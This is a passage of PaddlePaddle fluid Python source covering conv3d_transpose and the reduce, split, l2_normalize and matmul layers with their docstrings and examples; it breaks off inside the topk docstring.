The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Variable holding Tensor representing the conv3d_transpose, whose data
type is the same with input and shape is (num_batches, channels, out_d, out_h,
out_w) or (num_batches, out_d, out_h, out_w, channels). If act is None, the tensor
variable storing the transposed convolution result, and if act is not None, the tensor
variable storing transposed convolution and non-linearity activation result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ValueError: If `output_size` and filter_size are None at the same time.
ShapeError: If the input is not 5-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels.
ShapeError: If the size of `output_size` is not equal to that of `stride`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 12, 32, 32], dtype='float32')
conv3d_transpose = fluid.layers.conv3d_transpose(input=data, num_filters=2, filter_size=3)
"""
assert param_attr is not False, "param_attr should not be False in conv3d_transpose."
if data_format not in ['NCDHW', 'NDHWC']:
raise ValueError(
"Param(data_format) of Op(fluid.layers.conv3d_transpose) got wrong value: received "
+ data_format + " but only NCDHW or NDHWC supported.")
l_type = "conv3d_transpose"
helper = LayerHelper(l_type, **locals())
if not isinstance(input, Variable):
raise TypeError("Input of conv3d_transpose must be Variable")
input_channel = input.shape[1] if data_format == 'NCDHW' else input.shape[
-1]
stride = utils.convert_to_list(stride, 3, 'stride')
dilation = utils.convert_to_list(dilation, 3, 'dilation')
if not isinstance(use_cudnn, bool):
raise ValueError("use_cudnn should be True or False")
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 5:
if is_list_or_tuple(padding[0]) and (data_format == "NCDHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:5]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NDHWC"):
if not (padding[0] == [0, 0] and padding[4] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:4]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 6, 'padding')
elif is_list_or_tuple(padding) and len(padding) == 6:
padding = utils.convert_to_list(padding, 6, 'padding')
else:
padding = utils.convert_to_list(padding, 3, 'padding')
padding = [
padding[0], padding[0], padding[1], padding[1], padding[2],
padding[2]
]
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'." %
str(padding))
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0, 0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0, 0, 0, 0]
padding = _update_padding(padding, data_format)
if filter_size is None:
if output_size is None:
raise ValueError("output_size must be set when filter_size is None")
if isinstance(output_size, int):
output_size = [output_size, output_size, output_size]
d_in = input.shape[2] if data_format == 'NCDHW' else input.shape[1]
h_in = input.shape[3] if data_format == 'NCDHW' else input.shape[2]
w_in = input.shape[4] if data_format == 'NCDHW' else input.shape[3]
filter_size_d = (output_size[0] - (d_in - 1) * stride[0] + padding[0] +
padding[1] - 1) // dilation[0] + 1
filter_size_h = (output_size[1] - (h_in - 1) * stride[1] + padding[2] +
padding[3] - 1) // dilation[1] + 1
filter_size_w = (output_size[2] - (w_in - 1) * stride[2] + padding[4] +
padding[5] - 1) // dilation[2] + 1
filter_size = [filter_size_d, filter_size_h, filter_size_w]
else:
filter_size = utils.convert_to_list(filter_size, 3,
'conv3d_transpose.filter_size')
if len(padding) == 6 and utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
if output_size is None:
output_size = []
elif isinstance(output_size, (list, tuple, int)):
output_size = utils.convert_to_list(output_size, 3, 'output_size')
else:
raise ValueError("output_size should be int, list[int] or tuple[int]")
groups = 1 if groups is None else groups
filter_shape = [input_channel, num_filters // groups] + filter_size
img_filter = helper.create_parameter(
dtype=input.dtype, shape=filter_shape, attr=helper.param_attr)
if data_format == 'NCDHW':
data_format = 'NCHW'
if data_format == 'NDHWC':
data_format = 'NHWC'
pre_bias = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type=l_type,
inputs={'Input': [input],
'Filter': [img_filter]},
outputs={'Output': pre_bias},
attrs={
'output_size': output_size,
'strides': stride,
'paddings': padding,
'padding_algorithm': padding_algorithm,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'data_format': data_format
})
if data_format == 'NCHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=4, dim_end=5)
out = helper.append_activation(pre_act)
return out
def reduce_sum(input, dim=None, keep_dim=False, name=None):
"""
Computes the sum of tensor elements over the given dimension.
Args:
input (Variable): The input variable which is a Tensor, the data type is float32,
float64, int32, int64.
dim (list|int, optional): The dimensions along which the sum is performed. If
:attr:`None`, sum all elements of :attr:`input` and return a
Tensor variable with a single element, otherwise must be in the
range :math:`[-rank(input), rank(input))`. If :math:`dim[i] < 0`,
the dimension to reduce is :math:`rank + dim[i]`.
keep_dim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: Tensor, results of summation operation on the specified dim of input tensor,
it's data type is the same as input's Tensor.
Raises:
TypeError, if out data type is different with the input data type.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# x is a Tensor variable with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = fluid.data(name='x', shape=[2, 4], dtype='float32')
fluid.layers.reduce_sum(x) # [3.5]
fluid.layers.reduce_sum(x, dim=0) # [0.3, 0.5, 1.1, 1.6]
fluid.layers.reduce_sum(x, dim=-1) # [1.9, 1.6]
fluid.layers.reduce_sum(x, dim=1, keep_dim=True) # [[1.9], [1.6]]
# y is a Tensor variable with shape [2, 2, 2] and elements as below:
# [[[1, 2], [3, 4]],
# [[5, 6], [7, 8]]]
# Each example is followed by the corresponding output tensor.
y = fluid.data(name='y', shape=[2, 2, 2], dtype='float32')
fluid.layers.reduce_sum(y, dim=[1, 2]) # [10, 26]
fluid.layers.reduce_sum(y, dim=[0, 1]) # [16, 20]
"""
if dim is not None and not isinstance(dim, list):
dim = [dim]
if in_dygraph_mode():
reduce_all = True if dim == None or dim == [] else False
dim = dim if dim != None and dim != [] else [0]
return core.ops.reduce_sum(input, 'dim', dim, 'keep_dim', keep_dim,
'reduce_all', reduce_all)
attrs = {
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
}
check_variable_and_dtype(
input, 'input', ['float32', 'float64', 'int32', 'int64'], 'reduce_sum')
helper = LayerHelper('reduce_sum', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
helper.append_op(
type='reduce_sum',
inputs={'X': input},
outputs={'Out': out},
attrs=attrs)
return out
def reduce_mean(input, dim=None, keep_dim=False, name=None):
"""
Computes the mean of the input tensor's elements along the given dimension.
Args:
input (Variable): The input variable which is a Tensor, the data type is float32,
float64, int32, int64.
dim (list|int, optional): The dimension along which the mean is computed. If
`None`, compute the mean over all elements of :attr:`input`
and return a variable with a single element, otherwise it
must be in the range :math:`[-rank(input), rank(input))`. If
:math:`dim[i] < 0`, the dimension to reduce is
:math:`rank(input) + dim[i]`.
keep_dim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: Tensor, results of average on the specified dim of input tensor,
it's data type is the same as input's Tensor.
Raises:
TypeError, if out data type is different with the input data type.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# x is a Tensor variable with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = fluid.data(name='x', shape=[2, 4], dtype='float32')
fluid.layers.reduce_mean(x) # [0.4375]
fluid.layers.reduce_mean(x, dim=0) # [0.15, 0.25, 0.55, 0.8]
fluid.layers.reduce_mean(x, dim=-1) # [0.475, 0.4]
fluid.layers.reduce_mean(x, dim=1, keep_dim=True) # [[0.475], [0.4]]
# y is a Tensor variable with shape [2, 2, 2] and elements as below:
# [[[1.0, 2.0], [3.0, 4.0]],
# [[5.0, 6.0], [7.0, 8.0]]]
# Each example is followed by the corresponding output tensor.
y = fluid.data(name='y', shape=[2, 2, 2], dtype='float32')
fluid.layers.reduce_mean(y, dim=[1, 2]) # [2.5, 6.5]
fluid.layers.reduce_mean(y, dim=[0, 1]) # [4.0, 5.0]
"""
if dim is not None and not isinstance(dim, list):
dim = [dim]
if in_dygraph_mode():
reduce_all = True if dim == None or dim == [] else False
dim = dim if dim != None and dim != [] else [0]
return core.ops.reduce_mean(input, 'dim', dim, 'keep_dim', keep_dim,
'reduce_all', reduce_all)
attrs = {
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
}
check_variable_and_dtype(
input, 'input', ['float32', 'float64', 'int32', 'int64'], 'reduce_mean')
helper = LayerHelper('reduce_mean', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
helper.append_op(
type='reduce_mean',
inputs={'X': input},
outputs={'Out': out},
attrs=attrs)
return out
def reduce_max(input, dim=None, keep_dim=False, name=None):
"""
Computes the maximum of tensor elements over the given dimension.
Args:
input (Variable): The input variable which is a Tensor, the data type is float32,
float64, int32, int64.
dim (list|int, optional): The dimension along which the maximum is computed.
If :attr:`None`, compute the maximum over all elements of
:attr:`input` and return a Tensor variable with a single element,
otherwise must be in the range :math:`[-rank(input), rank(input))`.
If :math:`dim[i] < 0`, the dimension to reduce is :math:`rank + dim[i]`.
keep_dim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: Tensor, results of maximum on the specified dim of input tensor,
it's data type is the same as input's Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# x is a Tensor variable with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = fluid.data(name='x', shape=[2, 4], dtype='float32')
fluid.layers.reduce_max(x) # [0.9]
fluid.layers.reduce_max(x, dim=0) # [0.2, 0.3, 0.6, 0.9]
fluid.layers.reduce_max(x, dim=-1) # [0.9, 0.7]
fluid.layers.reduce_max(x, dim=1, keep_dim=True) # [[0.9], [0.7]]
# y is a Tensor variable with shape [2, 2, 2] and elements as below:
# [[[1.0, 2.0], [3.0, 4.0]],
# [[5.0, 6.0], [7.0, 8.0]]]
# Each example is followed by the corresponding output tensor.
y = fluid.data(name='y', shape=[2, 2, 2], dtype='float32')
fluid.layers.reduce_max(y, dim=[1, 2]) # [4.0, 8.0]
fluid.layers.reduce_max(y, dim=[0, 1]) # [7.0, 8.0]
"""
helper = LayerHelper('reduce_max', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
if dim is not None and not isinstance(dim, list):
dim = [dim]
helper.append_op(
type='reduce_max',
inputs={'X': input},
outputs={'Out': out},
attrs={
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
})
return out
def reduce_min(input, dim=None, keep_dim=False, name=None):
"""
Computes the minimum of tensor elements over the given dimension.
Args:
input (Variable): The input variable which is a Tensor, the data type is float32,
float64, int32, int64.
dim (list|int, optional): The dimensions along which the minimum is computed.
If :attr:`None`, compute the minimum over all elements of
:attr:`input` and return a Tensor variable with a single element,
otherwise must be in the range :math:`[-rank(input), rank(input))`.
If :math:`dim[i] < 0`, the dimension to reduce is :math:`rank + dim[i]`.
keep_dim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: Tensor, result of minimum on the specified dim of input tensor,
it's data type is the same as input's Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# x is a Tensor variable with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = fluid.data(name='x', shape=[2, 4], dtype='float32')
fluid.layers.reduce_min(x) # [0.1]
fluid.layers.reduce_min(x, dim=0) # [0.1, 0.2, 0.5, 0.7]
fluid.layers.reduce_min(x, dim=-1) # [0.2, 0.1]
fluid.layers.reduce_min(x, dim=1, keep_dim=True) # [[0.2], [0.1]]
# y is a Tensor variable with shape [2, 2, 2] and elements as below:
# [[[1.0, 2.0], [3.0, 4.0]],
# [[5.0, 6.0], [7.0, 8.0]]]
# Each example is followed by the corresponding output tensor.
y = fluid.data(name='y', shape=[2, 2, 2], dtype='float32')
fluid.layers.reduce_min(y, dim=[1, 2]) # [1.0, 5.0]
fluid.layers.reduce_min(y, dim=[0, 1]) # [1.0, 2.0]
"""
helper = LayerHelper('reduce_min', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
if dim is not None and not isinstance(dim, list):
dim = [dim]
helper.append_op(
type='reduce_min',
inputs={'X': input},
outputs={'Out': out},
attrs={
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
})
return out
def reduce_prod(input, dim=None, keep_dim=False, name=None):
"""
Computes the product of tensor elements over the given dimension.
Args:
input (Variable): The input variable which is a Tensor, the data type is float32,
float64, int32, int64.
dim (list|int, optional): The dimensions along which the product is performed. If
:attr:`None`, multiply all elements of :attr:`input` and return a
Tensor variable with a single element, otherwise must be in the
range :math:`[-rank(input), rank(input))`. If :math:`dim[i] < 0`,
the dimension to reduce is :math:`rank + dim[i]`.
keep_dim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: Tensor, result of product on the specified dim of input tensor,
it's data type is the same as input's Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# x is a Tensor variable with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = fluid.data(name='x', shape=[2, 4], dtype='float32')
fluid.layers.reduce_prod(x) # [0.0002268]
fluid.layers.reduce_prod(x, dim=0) # [0.02, 0.06, 0.3, 0.63]
fluid.layers.reduce_prod(x, dim=-1) # [0.027, 0.0084]
fluid.layers.reduce_prod(x, dim=1,
keep_dim=True) # [[0.027], [0.0084]]
# y is a Tensor variable with shape [2, 2, 2] and elements as below:
# [[[1.0, 2.0], [3.0, 4.0]],
# [[5.0, 6.0], [7.0, 8.0]]]
# Each example is followed by the corresponding output tensor.
y = fluid.data(name='y', shape=[2, 2, 2], dtype='float32')
fluid.layers.reduce_prod(y, dim=[1, 2]) # [24.0, 1680.0]
fluid.layers.reduce_prod(y, dim=[0, 1]) # [105.0, 384.0]
"""
helper = LayerHelper('reduce_prod', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
if dim is not None and not isinstance(dim, list):
dim = [dim]
helper.append_op(
type='reduce_prod',
inputs={'X': input},
outputs={'Out': out},
attrs={
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
})
return out
def reduce_all(input, dim=None, keep_dim=False, name=None):
"""
This OP computes the ``logical and`` of tensor elements over the given dimension, and output the result.
Args:
input (Variable): The input variable which is a Tensor or LoDTensor, the input data type should be `bool`.
dim (list|int|optional): The dimension along which the logical and is computed.
If :attr:`None`, compute the logical and over all elements of
:attr:`input` and return a Tensor variable with a single element,
otherwise must be in the range :math:`[-rank(input), rank(input))`.
If :math:`dim[i] < 0`, the dimension to reduce is :math:`rank + dim[i]`. The default value is None.
keep_dim (bool): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true. The default value is False.
name(str|None): A name for this layer(optional). If set None, the layer
will be named automatically. The default value is None.
Returns:
Variable, the output data type is bool. : The reduced tensor variable with ``logical and`` in given dims.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
import numpy as np
# x is a bool Tensor variable with following elements:
# [[True, False]
# [True, True]]
x = layers.assign(np.array([[1, 0], [1, 1]], dtype='int32'))
x = layers.cast(x, 'bool')
out = layers.reduce_all(x) # False
out = layers.reduce_all(x, dim=0) # [True, False]
out = layers.reduce_all(x, dim=-1) # [False, True]
# keep_dim=False, x.shape=(2,2), out.shape=(2,)
out = layers.reduce_all(x, dim=1, keep_dim=True) # [[False], [True]]
# keep_dim=True, x.shape=(2,2), out.shape=(2,1)
"""
helper = LayerHelper('reduce_all', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
if dim is not None and not isinstance(dim, list):
dim = [dim]
helper.append_op(
type='reduce_all',
inputs={'X': input},
outputs={'Out': out},
attrs={
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
})
return out
def reduce_any(input, dim=None, keep_dim=False, name=None):
"""
This OP computes the ``logical or`` of tensor elements over the given dimension, and output the result.
Args:
input (Variable): The input variable which is a Tensor or LoDTensor, the input data type should be `bool`.
dim (list|int|optional): The dimension along which the logical and is computed.
If :attr:`None`, compute the logical and over all elements of
:attr:`input` and return a Tensor variable with a single element,
otherwise must be in the range :math:`[-rank(input), rank(input))`.
If :math:`dim[i] < 0`, the dimension to reduce is :math:`rank + dim[i]`. The default value is None.
keep_dim (bool): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true. The default value is False.
name(str|None): A name for this layer(optional). If set None, the layer
Returns:
Variable, the output data type is bool. : The reduced tensor variable with ``logical or`` in given dims.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
import numpy as np
# x is a bool Tensor variable with following elements:
# [[True, False]
# [False, False]]
x = layers.assign(np.array([[1, 0], [0, 0]], dtype='int32'))
x = layers.cast(x, 'bool')
out = layers.reduce_any(x) # True
out = layers.reduce_any(x, dim=0) # [True, False]
out = layers.reduce_any(x, dim=-1) # [True, False]
# keep_dim=False, x.shape=(2,2), out.shape=(2,)
out = layers.reduce_any(x, dim=1,
keep_dim=True) # [[True], [False]]
# keep_dim=True, x.shape=(2,2), out.shape=(2,1)
"""
helper = LayerHelper('reduce_any', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
if dim is not None and not isinstance(dim, list):
dim = [dim]
helper.append_op(
type='reduce_any',
inputs={'X': input},
outputs={'Out': out},
attrs={
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
})
return out
def split(input, num_or_sections, dim=-1, name=None):
"""
Split the input tensor into multiple sub-Tensors.
Args:
input (Variable): The input variable which is an N-D Tensor or LoDTensor, data type being float32, float64, int32 or int64.
num_or_sections (int|list|tuple): If :attr:`num_or_sections` is an integer,
then the integer indicates the number of equal sized sub-Tensors
that the Tensor will be divided into. If :attr:`num_or_sections`
is a list or tuple, the length of it indicates the number of
sub-Tensors and the elements in it indicate the sizes of sub-Tensors'
:attr:`dim` dimension orderly. The length of the list mustn't be larger than the Tensor's size of :attr:`dim` .
dim (int32|Varible, optional): A scalar with type ``int32`` or a ``Tensor`` with shape [1] and type ``int32``. The dimension along which to split. If :math:`dim < 0`, the
dimension to split along is :math:`rank(input) + dim`. Default is -1.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
list(Variable): The list of segmented Tensor variables.
Raises:
TypeError: num_or_sections is not int, list or tuple.
TypeError: dim is not int or Variable.
Example:
.. code-block:: python
import paddle.fluid as fluid
# input is a variable which shape is [3, 9, 5]
input = fluid.data(
name="input", shape=[3, 9, 5], dtype="float32")
x0, x1, x2 = fluid.layers.split(input, num_or_sections=3, dim=1)
# x0.shape [3, 3, 5]
# x1.shape [3, 3, 5]
# x2.shape [3, 3, 5]
x0, x1, x2 = fluid.layers.split(input, num_or_sections=[2, 3, 4], dim=1)
# x0.shape [3, 2, 5]
# x1.shape [3, 3, 5]
# x2.shape [3, 4, 5]
x0, x1, x2 = fluid.layers.split(input, num_or_sections=[2, 3, -1], dim=1)
# x0.shape [3, 2, 5]
# x1.shape [3, 3, 5]
# x2.shape [3, 4, 5]
"""
if in_dygraph_mode():
num = None
attrs = ()
if isinstance(dim, Variable):
dim = dim.numpy()
assert dim.shape == (1,
), "dim of type Variable should have shape [1]"
dim = dim[0]
dim = (len(input.shape) + dim) if dim < 0 else dim
attrs += ('axis', dim)
if isinstance(num_or_sections, int):
num = num_or_sections
attrs += ('num', num_or_sections)
elif isinstance(num_or_sections, (list, tuple)):
num = len(num_or_sections)
if utils._contain_var(num_or_sections):
raise TypeError(
"The type of 'num_or_sections' in split must be int or list[int] or tuple[int] in Dygraph mode, but "
"received %s, which contains Variable." %
(type(num_or_sections)))
else:
attrs += ('sections', list(num_or_sections))
else:
raise TypeError(
"The type of 'num_or_sections' in split must be int or list in Dygraph mode, but "
"received %s." % (type(num_or_sections)))
return core.ops.split(input, num, *attrs)
if not isinstance(num_or_sections, (int, list, tuple)):
raise TypeError(
"The type of 'num_or_sections' in split must be int, list or "
"tuple, but received %s." % (type(num_or_sections)))
if not isinstance(dim, (int, Variable)):
raise TypeError(
"The type of 'dim' in split must be int or Variable, but "
"received %s." % (type(dim)))
helper = LayerHelper('split', **locals())
input_shape = input.shape
inputs = {'X': input}
attrs = {'num': num_or_sections if isinstance(num_or_sections, int) else 0}
def _get_SectionsTensorList(one_list):
tensor_list = []
unk_dim_idx = -1
for idx, dim_size in enumerate(one_list):
if isinstance(dim_size, Variable):
dim_size.stop_gradient = True
tensor_list.append(dim_size)
else:
assert (isinstance(dim_size, int))
if dim_size == -1:
assert unk_dim_idx == -1, (
"Only one value of 'num_or_section' in split can "
"be -1. But received num_or_section[%d] is also -1." %
idx)
unk_dim_idx = idx
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant(
[1], 'int32', dim_size, force_cpu=True, out=temp_out)
tensor_list.append(temp_out)
return tensor_list
if isinstance(dim, Variable):
dim.stop_gradient = True
inputs['AxisTensor'] = dim
else:
dim = (len(input_shape) + dim) if dim < 0 else dim
attrs['axis'] = dim
if isinstance(num_or_sections, int):
assert num_or_sections > 1, 'num_or_sections must be more than 1.'
if isinstance(dim, int) and input_shape[dim] > 0:
assert input_shape[dim] % num_or_sections ==0, \
"The input's size along the split dimension " \
"must be evenly divisible by Attr(num_or_sections). " \
"But %d is not evenly divisible by %d. " % (num_or_sections,input_shape[dim])
num = num_or_sections
else:
if isinstance(dim, int) and input_shape[dim] > 0:
assert len(num_or_sections) <= input_shape[
dim], 'len(num_or_sections) must not be more than input.shape[dim].'
num = len(num_or_sections)
attrs['sections'] = list(
map(lambda ele: -1 if isinstance(ele, Variable) else ele,
num_or_sections))
if utils._contain_var(num_or_sections):
inputs['SectionsTensorList'] = _get_SectionsTensorList(
num_or_sections)
outs = [
helper.create_variable_for_type_inference(dtype=helper.input_dtype())
for i in range(num)
]
helper.append_op(
type='split', inputs=inputs, outputs={'Out': outs}, attrs=attrs)
return outs
def l2_normalize(x, axis, epsilon=1e-12, name=None):
"""
This op normalizes `x` along dimension `axis` using an L2
norm. For a 1-D tensor (`dim` is fixed to 0), this layer computes
.. math::
y = \\frac{x}{ \sqrt{\sum {x^2} + epsion }}
For `x` with more dimensions, this layer independently normalizes each 1-D
slice along dimension `axis`.
Args:
x(Variable|list): The input tensor could be N-D tensor, and the input data type could be float32 or float64.
axis(int): The axis on which to apply normalization. If `axis < 0`, \
the dimension to normalization is rank(X) + axis. -1 is the
last dimension.
epsilon(float): The epsilon value is used to avoid division by zero, \
the default value is 1e-12.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: The output has the same shape and data type with `x`.
Examples:
.. code-block:: python
# declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[2,3])
output = fluid.layers.l2_normalize(x=input,axis=0)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,3).astype("float32")
print(input_data)
# [[0.5171216 0.12704141 0.56018186]
# [0.93251234 0.5382788 0.81709313]]
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
print(output_data)
# [array([[0.48496857, 0.22970329, 0.56545246],
# [0.8745316 , 0.9732607 , 0.82478094]], dtype=float32)]
# imperative mode
import paddle.fluid.dygraph as dg
with dg.guard(place) as g:
input = dg.to_variable(input_data)
output = fluid.layers.l2_normalize(x=input, axis=-1)
print(output.numpy())
# [[0.66907585 0.16437206 0.7247892 ]
# [0.6899054 0.3982376 0.6045142 ]]
"""
if len(x.shape) == 1:
axis = 0
helper = LayerHelper("l2_normalize", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
norm = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="norm",
inputs={"X": x},
outputs={"Out": out,
"Norm": norm},
attrs={
"axis": 1 if axis is None else axis,
"epsilon": epsilon,
})
return out
def matmul(x, y, transpose_x=False, transpose_y=False, alpha=1.0, name=None):
"""
Applies matrix multiplication to two tensors.
Currently, the input tensors' rank can be any, but when the rank of any
inputs is bigger than 3, this two inputs' rank should be equal.
The actual behavior depends on the shapes of :math:`x`, :math:`y` and the
flag values of :attr:`transpose_x`, :attr:`transpose_y`. Specifically:
- If a transpose flag is specified, the last two dimensions of the tensor
are transposed. If the tensor is rank-1 of shape :math:`[D]`, then for
:math:`x` it is treated as :math:`[1, D]` in nontransposed form and as
:math:`[D, 1]` in transposed form, whereas for :math:`y` it is the
opposite: It is treated as :math:`[D, 1]` in nontransposed form and as
:math:`[1, D]` in transposed form.
- After transpose, the two tensors are 2-D or n-D and matrix multiplication
performs in the following way.
- If both are 2-D, they are multiplied like conventional matrices.
- If either is n-D, it is treated as a stack of matrices residing in the
last two dimensions and a batched matrix multiply supporting broadcast
applies on the two tensors.
Also note that if the raw tensor :math:`x` or :math:`y` is rank-1 and
nontransposed, the prepended or appended dimension :math:`1` will be
removed after matrix multiplication.
Args:
x (Variable): The input variable which is a Tensor or LoDTensor.
y (Variable): The input variable which is a Tensor or LoDTensor.
transpose_x (bool): Whether to transpose :math:`x` before multiplication.
transpose_y (bool): Whether to transpose :math:`y` before multiplication.
alpha (float): The scale of output. Default 1.0.
name(str|None): A name for this layer(optional). If set None, the layer
will be named automatically.
Returns:
Variable: The product Tensor (or LoDTensor) variable.
Examples:
.. code-block:: python
# Examples to clarify shapes of the inputs and output
# x: [B, ..., M, K], y: [B, ..., K, N]
# fluid.layers.matmul(x, y) # out: [B, ..., M, N]
# x: [B, M, K], y: [B, K, N]
# fluid.layers.matmul(x, y) # out: [B, M, N]
# x: [B, M, K], y: [K, N]
# fluid.layers.matmul(x, y) # out: [B, M, N]
# x: [M, K], y: [K, N]
# fluid.layers.matmul(x, y) # out: [M, N]
# x: [B, M, K], y: [K]
# fluid.layers.matmul(x, y) # out: [B, M]
# x: [K], y: [K]
# fluid.layers.matmul(x, y) # out: [1]
# x: [M], y: [N]
# fluid.layers.matmul(x, y, True, True) # out: [M, N]
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[2, 3], dtype='float32')
y = fluid.layers.data(name='y', shape=[3, 2], dtype='float32')
out = fluid.layers.matmul(x, y, True, True)
"""
return paddle.matmul(x, y, transpose_x, transpose_y, alpha, name)
def topk(input, k, name=None):
"""
This OP is used to find values and indices of the k largest entries
for the last dimension.
If the input is a 1-D Tensor, finds the k largest entries and outputs
their values and indices.
If the input is a Tensor with higher rank, this operator computes the top k
entries along the last dimension.
.. code-block:: text
Case 1:
Input:
input.shape = [3, 4]
input.data = [[5, 4, 2, 3],
[9, 7, 10, 25],
[6, 2, 10, 1]]
k = 2
Output:
The first output:
values.shape = [3, 2]
values.data = [[5, 4],
[10, 25],
[6, 10]]
The second output:
indices.shape = [3, 2]
indices.data = [[0, 1],
[2, 3],
[0, 2]]
Args:
input(Variable): The input tensor. Support data types: float32, float64.
k(int | Variable): The number of top elements to look for along the last dimension
of input tensor.
name (str, optional): Please refer to :ref:`api_guide_Name`, Default None.
Returns:
